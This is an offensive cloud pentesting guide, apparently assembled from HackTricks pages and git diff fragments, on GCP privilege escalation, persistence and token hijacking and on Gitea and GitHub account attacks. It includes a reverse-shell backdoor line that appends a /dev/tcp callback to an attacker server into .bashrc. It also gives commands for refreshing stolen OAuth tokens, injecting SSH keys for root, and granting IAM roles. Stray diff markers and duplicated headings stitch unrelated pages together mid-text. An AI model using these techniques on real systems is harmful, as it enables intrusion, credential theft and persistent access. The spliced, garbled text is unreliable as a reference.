## apikeys.keys.regenerate,apikeys.keys.list <a href="#serviceusage.apikeys.regenerateapikeys.keys.list" id="serviceusage.apikeys.regenerateapikeys.keys.list"></a>

These permissions will (potentially) allow you to **list and regenerate all the API keys, getting the new key**.\
It's not possible to use this from `gcloud` but you probably can use it via the API. Once it's supported, the exploitation will be similar to the previous one (I guess).
## apikeys.keys.lookup <a href="#apikeys.keys.lookup" id="apikeys.keys.lookup"></a>

This is extremely useful to check **which GCP project an API key you have found belongs to**.
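As a hedged sketch, the lookup maps onto the API Keys API's `keys:lookupKey` method; the response's `parent` field (e.g. `projects/<number>/locations/global`) reveals the owning project. The exact endpoint shape should be verified against the current API surface:

```python
# Illustrative: build the lookup URL for a found API key. You still need to
# authenticate the request with your own credentials.
from urllib.parse import quote

def build_lookup_url(api_key: str) -> str:
    return ("https://apikeys.googleapis.com/v2/keys:lookupKey"
            f"?keyString={quote(api_key)}")

# The JSON response is expected to contain a "parent" field such as
# "projects/5[...]6/locations/global" identifying the project.
```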
In this scenario it could also be interesting to run the tool [https://github.com/ozguralp/gmapsapiscanner](https://github.com/ozguralp/gmapsapiscanner) and check what you can access with the API key
# secretmanager

## secretmanager.secrets.get

This gives you access to read the secrets from Secret Manager.

## secretmanager.secrets.setIamPolicy

This gives you the ability to grant yourself access to read the secrets from Secret Manager.
# \*.setIamPolicy

If you own a user that has the **`setIamPolicy`** permission on a resource you can **escalate privileges in that resource**, because you will be able to change the IAM policy of that resource and grant yourself more privileges over it.
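At project level this can be a one-liner; as a minimal sketch (the member and role are illustrative choices, not the only options):

```python
# Illustrative: compose the gcloud command that abuses a project-level
# setIamPolicy permission to grant an attacker-controlled principal a role.
def build_binding_cmd(project: str, member: str,
                      role: str = "roles/owner") -> list:
    return [
        "gcloud", "projects", "add-iam-policy-binding", project,
        "--member", member,   # e.g. "user:attacker@example.com"
        "--role", role,
    ]
```

The same pattern applies per-resource (buckets, functions, secrets, ...), each with its own `add-iam-policy-binding`/`set-iam-policy` subcommand.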
An **example** of privilege escalation abusing .setIamPolicy (in this case in a bucket) can be found here:

{% content-ref url="../gcp-buckets-brute-force-and-privilege-escalation.md" %}
[gcp-buckets-brute-force-and-privilege-escalation.md](../gcp-buckets-brute-force-and-privilege-escalation.md)
{% endcontent-ref %}
# Generic Interesting Permissions

## \*.create, \*.update

These permissions can be very useful when trying to escalate privileges in resources by **creating a new one or updating an existing one**. These kinds of permissions are especially useful if you also have the permission **iam.serviceAccounts.actAs** over a Service Account and the resource you have .create/.update over can attach a service account.

## \*ServiceAccount\*

This permission will usually let you **access or modify a Service Account in some resource** (e.g.: compute.instances.setServiceAccount). This **could lead to a privilege escalation** vector, but it will depend on each case.
# References

* [https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/)
* [https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/](https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/#gcp-privesc-scanner)
</details>
# Crypto Keys

[Cloud Key Management Service](https://cloud.google.com/kms/docs/) is a repository for storing cryptographic keys, such as those used to **encrypt and decrypt sensitive files**. Individual keys are stored in key rings, and granular permissions can be applied at either level.
```bash
gcloud kms decrypt --ciphertext-file=[INFILE] \
    --location global
```
# Secrets Management

Google [Secrets Management](https://cloud.google.com/solutions/secrets-management/) is a vault-like solution for storing passwords, API keys, certificates, and other sensitive data. As of this writing, it is currently in beta.
```bash
gcloud beta secrets versions access 1 --secret="[SECRET NAME]"
```

Note that changing a secret entry will create a new version, so it's worth changing the `1` in the command above to a `2` and so on.
# References

* [https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/#reviewing-stackdriver-logging](https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/#reviewing-stackdriver-logging)
</details>
# GCP - Local Privilege Escalation / SSH Pivoting

In this scenario we are going to suppose that you **have compromised a non-privileged account** inside a VM in a Compute Engine project.

Amazingly, GCP permissions of the compute engine you have compromised may help you to **escalate privileges locally inside a machine**. Even if that won't always be very helpful in a cloud environment, it's good to know it's possible.
# Read the scripts <a href="#follow-the-scripts" id="follow-the-scripts"></a>

**Compute Instances** are probably there to **execute some scripts** to perform actions with their service accounts.
Running `gsutil ls` from the command line returns nothing, as the service account is lacking the `storage.buckets.list` IAM permission.
You may be able to find this bucket name inside a script (in bash, Python, Ruby...).
# Custom Metadata

Administrators can add [custom metadata](https://cloud.google.com/compute/docs/storing-retrieving-metadata#custom) at the instance and project level. This is simply a way to pass **arbitrary key/value pairs into an instance**, and is commonly used for environment variables and startup/shutdown scripts.
```bash
curl "http://metadata.google.internal/computeMetadata/v1/instance/attributes/?recursive=true" \
    -H "Metadata-Flavor: Google"
```
# Modifying the metadata <a href="#modifying-the-metadata" id="modifying-the-metadata"></a>

If you can **modify the instance's metadata**, there are numerous ways to escalate privileges locally. There are a few scenarios that can lead to a service account with this permission:
Although Google [recommends](https://cloud.google.com/compute/docs/access/service-accounts) not relying on access scopes to judge permissions, a token with one of the following scopes is especially interesting:

* `https://www.googleapis.com/auth/compute`
* `https://www.googleapis.com/auth/cloud-platform`
## **Add SSH keys to custom metadata**

**Linux** **systems** on GCP will typically be running [Python Linux Guest Environment for Google Compute Engine](https://github.com/GoogleCloudPlatform/compute-image-packages/tree/master/packages/python-google-compute-engine#accounts) scripts. One of these is the [accounts daemon](https://github.com/GoogleCloudPlatform/compute-image-packages/tree/master/packages/python-google-compute-engine#accounts), which **periodically** **queries** the instance metadata endpoint for **changes to the authorized SSH public keys**.
So, if you can **modify custom instance metadata** with your service account, you can **escalate** to root on the local system by **gaining SSH rights** to a privileged account. If you can modify **custom project metadata**, you can **escalate** to root on **any system in the current GCP project** that is running the accounts daemon.
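The `ssh-keys` metadata value the accounts daemon consumes is a simple `<username>:<public-key-line>` string; a minimal sketch of building one (the username "alice" is hypothetical):

```python
# Build the value for the "ssh-keys" metadata entry:
#   "<username>:<key-type> <base64-key> <comment>"
def build_ssh_keys_entry(username: str, pubkey_line: str) -> str:
    # pubkey_line is the contents of your id_rsa.pub / id_ed25519.pub
    return f"{username}:{pubkey_line.strip()}"

# entry = build_ssh_keys_entry("alice", open("key.pub").read())
# Write it to meta.txt, then push it with:
#   gcloud compute instances add-metadata [INSTANCE] \
#       --metadata-from-file ssh-keys=meta.txt
```

Once the daemon picks up the change, you can SSH in as that user with your private key.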
## **Add SSH key to existing privileged user**

Let's start by adding our own key to an existing account, as that will probably make the least noise.
```bash
alice@instance:~$ sudo id
uid=0(root) gid=0(root) groups=0(root)
```
## **Create a new privileged user and add an SSH key**

No existing keys found when following the steps above? No one else interesting in `/etc/passwd` to target?
```bash
gcloud compute instances add-metadata [INSTANCE_NAME] --metadata-from-file ssh-keys=meta.txt
ssh -i ./key "$NEWUSER"@localhost
```
## **Grant sudo to existing session**

This one is so easy, quick, and dirty that it feels wrong…
```bash
gcloud compute ssh [INSTANCE NAME]
```

This will **generate a new SSH key, add it to your existing user, and add your existing username to the `google-sudoers` group**, and start a new SSH session. While it is quick and easy, it may end up making more changes to the target system than the previous methods.
## SSH keys at project level <a href="#sshing-around" id="sshing-around"></a>

Following the details mentioned in the previous section you can try to compromise more VMs.
```bash
gcloud compute project-info add-metadata --metadata-from-file ssh-keys=meta.txt
```

If you're really bold, you can also just type `gcloud compute ssh [INSTANCE]` to use your current username on other boxes.
# **Using OS Login**

[**OS Login**](https://cloud.google.com/compute/docs/oslogin/) is an alternative to managing SSH keys. It links a **Google user or service account to a Linux identity**, relying on IAM permissions to grant or deny access to Compute Instances.
If your service account has these permissions, **you can simply run `gcloud compute ssh [INSTANCE]`** to connect as your current user.
Similar to using SSH keys from metadata, you can use this strategy to **escalate privileges locally and/or to access other Compute Instances** on the network.
# Search for Keys in the filesystem

It's quite possible that **other users on the same box have been running `gcloud`** commands using an account more powerful than your own. You'll **need local root** to do this.
You can manually inspect the files inside, but these are generally the ones with the most interesting information.
Now, you have the option of looking for clear text credentials in these files or simply copying the entire `gcloud` folder to a machine you control and running `gcloud auth list` to see what accounts are now available to you.
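A minimal sketch of scripting that search for Google-API-key-shaped strings: the `AIza` + 35 characters pattern is the commonly documented shape of GCP API keys, so any match is only a candidate that still needs validation:

```python
# Scan a directory tree for strings shaped like GCP API keys.
import re
from pathlib import Path

API_KEY_RE = re.compile(r"AIza[0-9A-Za-z_\-]{35}")

def find_candidate_keys(text: str) -> list:
    return API_KEY_RE.findall(text)

def scan_dir(target: str) -> dict:
    hits = {}
    for p in Path(target).rglob("*"):
        if not p.is_file():
            continue
        try:
            found = find_candidate_keys(p.read_text(errors="ignore"))
        except OSError:
            continue  # unreadable file (permissions, special files, ...)
        if found:
            hits[str(p)] = found
    return hits
```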
## More API Keys regexes

```bash
TARGET_DIR="/path/to/whatever"
```
</details>
# Stackdriver logging

[Stackdriver](https://cloud.google.com/stackdriver/) is Google's general-purpose infrastructure logging suite, which might be capturing sensitive information: syslog-like records of individual commands run inside Compute Instances, HTTP requests sent to load balancers or App Engine applications, network packet metadata for VPC communications, and more.
```bash
gcloud logging read [FOLDER]
gcloud logging write [FOLDER] [MESSAGE]
```
# AI platform configurations <a href="reviewing-ai-platform-configurations" id="reviewing-ai-platform-configurations"></a>

Google [AI Platform](https://cloud.google.com/ai-platform/) is another "serverless" offering for machine learning projects.
```bash
$ gcloud ai-platform models list --format=json
$ gcloud ai-platform jobs list --format=json
```
# Cloud pub/sub <a href="reviewing-cloud-pubsub" id="reviewing-cloud-pubsub"></a>

Google [Cloud Pub/Sub](https://cloud.google.com/pubsub/) is a service that allows independent applications to **send messages** back and forth. Basically, there are **topics** to which applications may **subscribe** to send and receive **messages** (which are composed of the message content and some metadata).
@ -74,7 +72,7 @@ gcloud pubsub subscriptions pull [SUBSCRIPTION NAME]
However, you may have better results [asking for a larger set of data](https://cloud.google.com/pubsub/docs/replay-overview), including older messages. This has some prerequisites and could impact applications, so make sure you really know what you're doing. However, you may have better results [asking for a larger set of data](https://cloud.google.com/pubsub/docs/replay-overview), including older messages. This has some prerequisites and could impact applications, so make sure you really know what you're doing.
-## Cloud Git repositories <a href="reviewing-cloud-git-repositories" id="reviewing-cloud-git-repositories"></a>
+# Cloud Git repositories <a href="reviewing-cloud-git-repositories" id="reviewing-cloud-git-repositories"></a>
Google's [Cloud Source Repositories](https://cloud.google.com/source-repositories/) are Git repositories designed to be private storage for source code. You might **find useful secrets here**, or use the **source to discover vulnerabilities** in other applications.
@@ -88,7 +86,7 @@ gcloud source repos list
gcloud source repos clone [REPO NAME]
```
-## Cloud Filestore Instances
+# Cloud Filestore Instances
Google [Cloud Filestore](https://cloud.google.com/filestore/) is NAS for Compute Instances and Kubernetes Engine instances. You can think of this like any other **shared document repository** - a potential source of sensitive info.
@@ -98,7 +96,7 @@ If you find a filestore available in the project, you can **mount it** from with
gcloud filestore instances list --format=json
```
-## Containers
+# Containers
```bash
gcloud container images list
@@ -110,7 +108,7 @@ gcloud container clusters get-credentials [NAME]
docker run --rm -ti gcr.io/<project-name>/secret:v1 sh
```
-## Kubernetes
+# Kubernetes
First, you can check to see if any Kubernetes clusters exist in your project.
@@ -136,7 +134,7 @@ You can read more about `gcloud` for containers [here](https://cloud.google.com/
This is a simple script to enumerate kubernetes in GCP: [https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/gcp\_k8s\_enum](https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/gcp\_k8s\_enum)
-## References
+# References
* [https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/#reviewing-stackdriver-logging](https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/#reviewing-stackdriver-logging)
@@ -17,11 +17,9 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details>
-# GCP - Network Enumeration
-## Network Enumeration
-### Compute
+# Network Enumeration
+## Compute
```bash
# List networks
@@ -17,13 +17,11 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details>
-# GCP - Persistance
These are useful techniques once, somehow, you have compromised some GCP credentials or machine running in a GCP environment.
-## Googles Cloud Shell <a href="#e5eb" id="e5eb"></a>
-### Persistent Backdoor
+# Googles Cloud Shell <a href="#e5eb" id="e5eb"></a>
+## Persistent Backdoor
[**Google Cloud Shell**](https://cloud.google.com/shell/) provides you with command-line access to your cloud resources directly from your browser without any associated cost.
@@ -41,7 +39,7 @@ This basically means that an attacker may put a backdoor in the home directory o
echo '(nohup /usr/bin/env -i /bin/bash 2>/dev/null -norc -noprofile >& /dev/tcp/'$CCSERVER'/443 0>&1 &)' >> $HOME/.bashrc
```
-### Container Escape
+## Container Escape
Note that Google Cloud Shell runs inside a container; you can **easily escape to the host** by doing:
@@ -70,9 +68,9 @@ https://www.googleapis.com/auth/logging.write
https://www.googleapis.com/auth/monitoring.write
```
-## Token Hijacking
+# Token Hijacking
-### Authenticated User
+## Authenticated User
If you manage to access the home folder of an **authenticated user in GCP**, by **default**, you will be able to **get tokens for that user as long as you want** without needing to authenticate again, independently of the machine you use his tokens from, and even if the user has MFA configured.
@@ -96,20 +94,20 @@ To get a new refreshed access token with the refresh token, client ID, and clien
curl -s --data client_id=<client_id> --data client_secret=<client_secret> --data grant_type=refresh_token --data refresh_token=<refresh_token> --data scope="https://www.googleapis.com/auth/cloud-platform https://www.googleapis.com/auth/accounts.reauth" https://www.googleapis.com/oauth2/v4/token
```
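The curl call above can be wrapped in a small helper that assembles the POST body from the three stolen values, so you only paste them once. This is only a sketch: the helper name is made up, and the endpoint and parameter names are simply the ones from the curl above.

```bash
#!/bin/bash
# Assemble the x-www-form-urlencoded body for the OAuth refresh request.
# The three arguments are the values looted from the victim's gcloud config.
build_refresh_body() {
  local client_id="$1" client_secret="$2" refresh_token="$3"
  printf 'client_id=%s&client_secret=%s&grant_type=refresh_token&refresh_token=%s' \
    "$client_id" "$client_secret" "$refresh_token"
}

# Hypothetical usage:
# curl -s --data "$(build_refresh_body "$CID" "$CSECRET" "$RTOKEN")" \
#      https://www.googleapis.com/oauth2/v4/token
```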
-### Service Accounts
+## Service Accounts
Just like with authenticated users, if you manage to **compromise the private key file** of a service account you will be able to **access it usually as long as you want**.\
However, if you steal the **OAuth token** of a service account this can be even more interesting because, even if by default these tokens are useful just for an hour, if the **victim deletes the private API key, the OAuth token will still be valid until it expires**.
-### Metadata
+## Metadata
Obviously, as long as you are inside a machine running in the GCP environment you will be able to **access the service account attached to that machine by contacting the metadata endpoint** (note that the OAuth tokens you can access in this endpoint are usually restricted by scopes).
-### Remediations
+## Remediations
Some remediations for these techniques are explained in [https://www.netskope.com/blog/gcp-oauth-token-hijacking-in-google-cloud-part-2](https://www.netskope.com/blog/gcp-oauth-token-hijacking-in-google-cloud-part-2)
-## References
+# References
* [https://89berner.medium.com/persistant-gcp-backdoors-with-googles-cloud-shell-2f75c83096ec](https://89berner.medium.com/persistant-gcp-backdoors-with-googles-cloud-shell-2f75c83096ec)
* [https://www.netskope.com/blog/gcp-oauth-token-hijacking-in-google-cloud-part-1](https://www.netskope.com/blog/gcp-oauth-token-hijacking-in-google-cloud-part-1)
@@ -17,9 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details>
-# GCP - Serverless Code Exec Services Enumeration
-## Cloud Functions <a href="reviewing-cloud-functions" id="reviewing-cloud-functions"></a>
+# Cloud Functions <a href="reviewing-cloud-functions" id="reviewing-cloud-functions"></a>
Google [Cloud Functions](https://cloud.google.com/functions/) allow you to host code that is executed when an event is triggered, without the requirement to manage a host operating system. These functions can also store environment variables to be used by the code.
@@ -35,18 +33,18 @@ gcloud functions describe [FUNCTION NAME]
gcloud functions logs read [FUNCTION NAME] --limit [NUMBER]
```
-### Enumerate Open Cloud Functions
+## Enumerate Open Cloud Functions
With the following code [taken from here](https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/gcp\_misc/-/blob/master/find\_open\_functions.sh) you can find Cloud Functions that permit unauthenticated invocations.
```bash
#!/bin/bash
-#############################
+############################
# Run this tool to find Cloud Functions that permit unauthenticated invocations
# anywhere in your GCP organization.
# Enjoy!
-#############################
+############################
for proj in $(gcloud projects list --format="get(projectId)"); do
echo "[*] scraping project $proj"
@@ -86,7 +84,7 @@ done
```
-## App Engine Configurations <a href="reviewing-app-engine-configurations" id="reviewing-app-engine-configurations"></a>
+# App Engine Configurations <a href="reviewing-app-engine-configurations" id="reviewing-app-engine-configurations"></a>
Google [App Engine](https://cloud.google.com/appengine/) is another ["serverless"](https://about.gitlab.com/topics/serverless/) offering for hosting applications, with a focus on scalability. As with Cloud Functions, **there is a chance that the application will rely on secrets that are accessed at run-time via environment variables**. These variables are stored in an `app.yaml` file which can be accessed as follows:
@@ -98,7 +96,7 @@ gcloud app versions list
gcloud app describe [APP]
```
-## Cloud Run Configurations <a href="reviewing-cloud-run-configurations" id="reviewing-cloud-run-configurations"></a>
+# Cloud Run Configurations <a href="reviewing-cloud-run-configurations" id="reviewing-cloud-run-configurations"></a>
Google [Cloud Run](https://cloud.google.com/run) is another serverless offering where you can also search for environment variables. Cloud Run creates a small web server, running on port 8080, that sits around waiting for an HTTP GET request. When the request is received, a job is executed and the job log is output via an HTTP response.
@@ -122,18 +120,18 @@ curl -H \
[URL]
```
-### Enumerate Open CloudRun
+## Enumerate Open CloudRun
With the following code [taken from here](https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/gcp\_misc/-/blob/master/find\_open\_cloudrun.sh) you can find Cloud Run services that permit unauthenticated invocations.
```bash
#!/bin/bash
-#############################
+############################
# Run this tool to find Cloud Run services that permit unauthenticated
# invocations anywhere in your GCP organization.
# Enjoy!
-#############################
+############################
for proj in $(gcloud projects list --format="get(projectId)"); do
echo "[*] scraping project $proj"
@@ -169,7 +167,7 @@ done
```
-## References
+# References
* [https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/#reviewing-stackdriver-logging](https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/#reviewing-stackdriver-logging)
@@ -17,21 +17,19 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details>
-# Gitea Security
-## What is Gitea
+# What is Gitea
**Gitea** is a **self-hosted community managed lightweight code hosting** solution written in Go.
![](<../../.gitbook/assets/image (655).png>)
-### Basic Information
+## Basic Information
{% content-ref url="basic-gitea-information.md" %}
[basic-gitea-information.md](basic-gitea-information.md)
{% endcontent-ref %}
-## Lab
+# Lab
To run a Gitea instance locally you can just run a docker container:
@@ -48,7 +46,7 @@ helm repo add gitea-charts https://dl.gitea.io/charts/
helm install gitea gitea-charts/gitea
```
-## Unauthenticated Enumeration
+# Unauthenticated Enumeration
* Public repos: [http://localhost:3000/explore/repos](http://localhost:3000/explore/repos)
* Registered users: [http://localhost:3000/explore/users](http://localhost:3000/explore/users)
@@ -56,11 +54,11 @@ helm install gitea gitea-charts/gitea
Note that by **default Gitea allows new users to register**. This won't give especially interesting access to the new users over other organizations/users repos, but a **logged-in user** might be able to **visualize more repos or organizations**.
-## Internal Exploitation
+# Internal Exploitation
For this scenario we are going to suppose that you have obtained some access to a Gitea account.
-### With User Credentials/Web Cookie
+## With User Credentials/Web Cookie
If you somehow already have credentials for a user inside an organization (or you stole a session cookie) you can **just login** and check which **permissions you have** over which **repos,** in **which teams** you are, **list other users**, and **how the repos are protected.**
@@ -70,7 +68,7 @@ Note that **2FA may be used** so you will only be able to access this informatio
Note that if you **manage to steal the `i_like_gitea` cookie** (currently configured with SameSite: Lax) you can **completely impersonate the user** without needing credentials or 2FA.
{% endhint %}
-### With User SSH Key
+## With User SSH Key
Gitea allows **users** to set **SSH keys** that will be used as an **authentication method to deploy code** on their behalf (no 2FA is applied).
@@ -86,7 +84,7 @@ If the user has configured its username as his gitea username you can access the
**SSH keys** can also be set in repositories as **deploy keys**. Anyone with access to this key will be able to **launch projects from a repository**. Usually in a server with different deploy keys the local file **`~/.ssh/config`** will give you info about which key is related to which repository.
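For reference, a `~/.ssh/config` that maps several deploy keys to their repositories typically looks something like this (the host aliases, hostname and key paths are illustrative):

```
Host gitea-repo1
    HostName gitea.example.com
    User git
    IdentityFile ~/.ssh/deploy_key_repo1
    IdentitiesOnly yes

Host gitea-repo2
    HostName gitea.example.com
    User git
    IdentityFile ~/.ssh/deploy_key_repo2
    IdentitiesOnly yes
```

Each `Host` alias ties one private key to one repository, which is exactly the key-to-repo mapping an attacker can read off this file.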
-#### GPG Keys
+### GPG Keys
As explained [**here**](../github-security/basic-github-information.md#ssh-keys) sometimes it's needed to sign the commits or you might get discovered.
@@ -96,13 +94,13 @@ Check locally if the current user has any key with:
gpg --list-secret-keys --keyid-format=long
```
-### With User Token
+## With User Token
For an introduction about [**User Tokens check the basic information**](basic-gitea-information.md#personal-access-tokens).
A user token can be used **instead of a password** to **authenticate** against the Gitea server [**via API**](https://try.gitea.io/api/swagger#/). It will have **complete access** over the user.
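As a sketch of what that looks like (the host, endpoint and token value are placeholders; `token` is the `Authorization` header scheme described in Gitea's Swagger docs):

```bash
#!/bin/bash
# Build the Authorization header value for a Gitea personal access token.
gitea_auth_header() {
  printf 'Authorization: token %s' "$1"
}

# Hypothetical usage against a local instance:
# curl -s -H "$(gitea_auth_header "$STOLEN_TOKEN")" http://localhost:3000/api/v1/user
```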
-### With Oauth Application
+## With Oauth Application
For an introduction about [**Gitea Oauth Applications check the basic information**](basic-gitea-information.md#oauth-applications).
@@ -110,7 +108,7 @@ An attacker might create a **malicious Oauth Application** to access privileged
As explained in the basic information, the application will have **full access over the user account**.
-### Branch Protection Bypass
+## Branch Protection Bypass
In Github we have **github actions** which by default get a **token with write access** over the repo that can be used to **bypass branch protections**. In Gitea that **doesn't exist**, so the bypasses are more limited. But let's take a look at what can be done:
@@ -123,7 +121,7 @@ In Github we have **github actions** which by default get a **token with write a
Note that **if you are an org/repo admin** you can bypass the protections.
-### Enumerate Webhooks
+## Enumerate Webhooks
**Webhooks** are able to **send specific gitea information to some places**. You might be able to **exploit that communication**.\
However, usually a **secret** you can **not retrieve** is set in the **webhook**, which will **prevent** external users that know the URL of the webhook, but not the secret, from **exploiting that webhook**.\
@@ -131,9 +129,9 @@ But in some occasions, people instead of setting the **secret** in its place, th
Webhooks can be set at **repo and at org level**.
-## Post Exploitation
+# Post Exploitation
-### Inside the server
+## Inside the server
If somehow you managed to get inside the server where gitea is running you should search for the gitea configuration file. By default it's located in `/data/gitea/conf/app.ini`
@@ -17,9 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details>
-# Basic Gitea Information
-## Basic Structure
+# Basic Structure
The basic gitea environment structure is to group repos by **organization(s),** each of them may contain **several repositories** and **several teams.** However, note that just like in GitHub users can have repos outside of the organization.
@@ -29,9 +27,9 @@ A user may also be **part of different teams** with different permissions over d
And finally **repositories may have special protection mechanisms**.
-## Permissions
+# Permissions
-### Organizations
+## Organizations
When an **organization is created** a team called **Owners** is **created** and the user is put inside of it. This team will give **admin access** over the **organization**; those **permissions** and the **name** of the team **cannot be modified**.
@@ -53,7 +51,7 @@ When creating a new team, several important settings are selected:
![](<../../.gitbook/assets/image (648) (1).png>)
-### Teams & Users
+## Teams & Users
In a repo, the **org admin** and the **repo admins** (if allowed by the org) can **manage the roles** given to collaborators (other users) and teams. There are **3** possible **roles**:
@@ -61,35 +59,35 @@ In a repo, the **org admin** and the **repo admins** (if allowed by the org) can
* Write
* Read
-## Gitea Authentication
+# Gitea Authentication
-### Web Access
+## Web Access
Using **username + password** and potentially (and recommended) a 2FA.
-### **SSH Keys**
+## **SSH Keys**
You can configure your account with one or several public keys allowing the related **private key to perform actions on your behalf.** [http://localhost:3000/user/settings/keys](http://localhost:3000/user/settings/keys)
-#### **GPG Keys**
+### **GPG Keys**
You **cannot impersonate the user with these keys**, but if you don't use them it might be possible that you **get discovered for sending commits without a signature**.
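Turning signing on for every commit is a one-time git config change; the key ID below is hypothetical and would come from `gpg --list-secret-keys --keyid-format=long`:

```bash
# Point git at the signing key and turn on signing for every commit.
git config --global user.signingkey 3AA5C34371567BD2
git config --global commit.gpgsign true
```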
-### **Personal Access Tokens**
+## **Personal Access Tokens**
You can generate a personal access token to **give an application access to your account**. A personal access token gives full access over your account: [http://localhost:3000/user/settings/applications](http://localhost:3000/user/settings/applications)
-### Oauth Applications
+## Oauth Applications
Just like personal access tokens, **Oauth applications** will have **complete access** over your account and the places your account has access to because, as indicated in the [docs](https://docs.gitea.io/en-us/oauth2-provider/#scopes), scopes aren't supported yet:
![](<../../.gitbook/assets/image (662).png>)
-### Deploy keys
+## Deploy keys
Deploy keys might have read-only or write access to the repo, so they might be interesting to compromise specific repos.
-## Branch Protections
+# Branch Protections
Branch protections are designed to **not give complete control of a repository** to the users. The goal is to **put several protection methods before being able to write code inside some branch**.
@@ -17,19 +17,17 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details>
-# Github Security
-## What is Github
+# What is Github
(From [here](https://kinsta.com/knowledgebase/what-is-github/)) At a high level, **GitHub is a website and cloud-based service that helps developers store and manage their code, as well as track and control changes to their code**.
-### Basic Information
+## Basic Information
{% content-ref url="basic-github-information.md" %}
[basic-github-information.md](basic-github-information.md)
{% endcontent-ref %}
-## External Recon
+# External Recon
Github repositories can be configured as public, private and internal.
@@ -39,7 +37,7 @@ Github repositories can be configured as public, private and internal.
In case you know the **user, repo or organisation you want to target** you can use **github dorks** to find sensitive information or search for **sensitive information leaks** **on each repo**.
### Github Dorks ## Github Dorks
Github allows to **search for something specifying as scope a user, a repo or an organisation**. Therefore, with a list of strings that are going to appear close to sensitive information you can easily **search for potential sensitive information in your target**. Github allows to **search for something specifying as scope a user, a repo or an organisation**. Therefore, with a list of strings that are going to appear close to sensitive information you can easily **search for potential sensitive information in your target**.
@@ -49,7 +47,7 @@ Tools (each tool contains its list of dorks):

* [https://github.com/techgaun/github-dorks](https://github.com/techgaun/github-dorks) ([Dorks list](https://github.com/techgaun/github-dorks/blob/master/github-dorks.txt))
* [https://github.com/hisxo/gitGraber](https://github.com/hisxo/gitGraber) ([Dorks list](https://github.com/hisxo/gitGraber/tree/master/wordlists))
## Github Leaks

Please, note that the github dorks are also meant to search for leaks using github search options. This section is dedicated to those tools that will **download each repo and search for sensitive information in them** (even checking a certain depth of commits).
@@ -63,11 +61,11 @@ Tools (each tool contains its list of regexes):

* [https://github.com/kootenpv/gittyleaks](https://github.com/kootenpv/gittyleaks)
* [https://github.com/awslabs/git-secrets](https://github.com/awslabs/git-secrets)
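As a hedged sketch of how such tools are typically run against a target repo (the repo name is a placeholder and the exact flags vary between tool versions, so check each tool's help output):

```bash
# Clone with full history so old commits are scanned too
git clone https://github.com/target-org/target-repo.git   # hypothetical target
cd target-repo

# gitleaks (v8 syntax): scan the working dir and the git history for secrets
gitleaks detect --source . --verbose

# trufflehog (v3 syntax): scan a remote repo directly
trufflehog git https://github.com/target-org/target-repo.git
```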
# Internal Recon & Attacks

For this scenario we are going to suppose that you have obtained some access to a github account.

## With User Credentials

If you somehow already have credentials for a user inside an organization you can **just login** and check which **enterprise and organization roles you have**. If you are a raw member, check which **permissions raw members have**, in which **groups** you are, which **permissions you have** over which **repos,** and **how the repos are protected.**
@@ -79,7 +77,7 @@ Note that if you **manage to steal the `user_session` cookie** (currently config

Check the section below about [**branch protections bypasses**](./#branch-protection-bypass) in case it's useful.
## With User SSH Key

Github allows **users** to set **SSH keys** that will be used as an **authentication method to deploy code** on their behalf (no 2FA is applied).
@@ -95,7 +93,7 @@ If the user has configured its username as his github username you can access th

**SSH keys** can also be set in repositories as **deploy keys**. Anyone with access to this key will be able to **launch projects from a repository**. Usually in a server with different deploy keys the local file **`~/.ssh/config`** will give you info about which key is related to which repo.
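As an illustration, this is what such a `~/.ssh/config` may look like on a server using several deploy keys (host aliases and key names are made up):

```
# ~/.ssh/config — each Host alias ties one deploy key to one repo
Host github.com-webapp
    Hostname github.com
    IdentityFile ~/.ssh/deploy_key_webapp
    IdentitiesOnly yes

Host github.com-backend
    Hostname github.com
    IdentityFile ~/.ssh/deploy_key_backend
    IdentitiesOnly yes
```

A repo cloned as `git@github.com-webapp:org/webapp.git` would then use `deploy_key_webapp`, which tells you which key grants access to which repo.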
### GPG Keys

As explained [**here**](basic-github-information.md#ssh-keys) sometimes it's needed to sign the commits or you might get discovered.
@@ -105,7 +103,7 @@ Check locally if the current user has any key with:

gpg --list-secret-keys --keyid-format=long
```
## With User Token

For an introduction about [**User Tokens check the basic information**](basic-github-information.md#personal-access-tokens).
@@ -113,7 +111,7 @@ A user token can be used **instead of a password** for Git over HTTPS, or can be

A User token looks like this: `ghp_EfHnQFcFHX6fGIu5mpduvRiYR584kK0dX123`
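A hedged sketch of how a stolen token can be used (the token value and repo names below are placeholders; `x-oauth-scopes` is the response header Github uses to report a token's scopes):

```bash
TOKEN=ghp_EfHnQFcFHX6fGIu5mpduvRiYR584kK0dX123   # placeholder token

# Git over HTTPS, using the token instead of a password
git clone https://$TOKEN@github.com/target-org/target-repo.git

# REST API: check who the token belongs to and which scopes it has
curl -sI -H "Authorization: token $TOKEN" https://api.github.com/user | grep -i x-oauth-scopes
```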
## With Oauth Application

For an introduction about [**Github Oauth Applications check the basic information**](basic-github-information.md#oauth-applications).
@@ -123,7 +121,7 @@ These are the [scopes an Oauth application can request](https://docs.github.com/

Moreover, as explained in the basic information, **organizations can give/deny access to third party applications** to information/repos/actions related with the organisation.
## With Github Application

For an introduction about [**Github Applications check the basic information**](basic-github-information.md#github-applications).
